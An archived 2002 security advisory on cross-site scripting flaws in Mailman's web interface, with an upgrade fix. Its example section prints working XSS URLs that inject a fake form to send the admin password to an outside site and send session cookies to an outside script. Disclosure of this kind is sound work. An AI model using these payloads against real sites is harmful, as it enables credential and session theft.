TUCoPS :: Web :: General :: web5556.htm

Mailman cross-site scripting bug
25th Jul 2002 [SBWID-5556]
COMMAND

	Mailman cross-site scripting bug

SYSTEMS AFFECTED

	Mailman 2.0.11 and under it

PROBLEM

	office  [office@ukky.net]   [office@office.ac]   [http://www.office.ac/]
	says :
	

	Mailman is software to help manage  electronic  mail  discussion  lists,
	much like  Majordomo  or  Smartmail.  And  Mailman  have  web  interface
	system.
	

	 Example

	 =======

	

	You can recognize the vulnerability with this type of URL;
	

	http://mailman_site/mailman_dirctory/admin/ml-name?"><script>alert("hello")</script>

	

	and that prove that any (malicious)  script  code  is  possible  on  web
	interface part of Mailman.
	

	For example, if you access to this URL  with  Internet  Explorer  (other
	browser is not affected by the URL), the page figure is similar to  real
	one, but the password of admin you enter and submit are send to  another
	malicious site (http://www.office.ac/). This URL are valid  for  version
	2.0.10.
	

	http://mailman_site/mailman_dirctory/admin/ml-name?adminpw="></form><form/action="http://www.office.ac/webform.cgi"/method="post"><br

	

	And Mailman 2.0.11 still have vulnerabilities, if you  access  to  these
	URL with Internet Explorer (other  browser  is  not  affected  by  these
	URL), your information in cookie about the mailman_site  could  be  send
	another malicious site (http://www.office.ac/).
	

	http://mailman_site/mailman_dirctory/admin/ml-name?adminpw="/onClick="window.open('http://www.office.ac/j.cgi?'+document.cookie);

	http://mailman_site/mailman/subscribe/ml-name?info=<script>document.location%3D"http://www.office.ac/j.cgi?"%2Bdocument.cookie;</script>

	

	

SOLUTION

	Users should upgrade to Mailman 2.0.12 or later
	

	http://mail.python.org/pipermail/mailman-announce/2002-July/000043.html

	

	

	

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH